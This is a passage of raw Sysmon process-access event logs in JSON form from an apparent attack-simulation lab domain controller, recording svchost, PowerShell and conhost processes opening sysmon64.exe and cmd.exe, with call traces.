07:59:21.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5848,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5849,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5850,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5851,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5852,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5853,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5854,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-001066360900}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-001066360900}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5855,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-001066360900}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-001066360900}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
